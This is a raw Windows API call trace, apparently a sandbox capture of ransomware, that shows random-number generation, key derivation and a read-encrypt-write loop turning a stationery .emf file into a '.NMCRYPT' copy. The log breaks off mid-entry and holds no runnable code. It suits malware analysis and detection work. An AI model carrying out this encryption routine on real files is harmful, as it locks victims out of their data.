[0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.012] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.013] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.013] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.014] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0163.014] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.014] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad278) returned 1 [0163.014] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.014] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.014] wcslen (_String="\\\\?\\") returned 0x4 [0163.014] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad8b8) returned 1 [0163.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.016] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3792) returned 1 [0163.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.017] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.017] GetLastError () returned 0x0 [0163.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.019] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.019] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.019] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 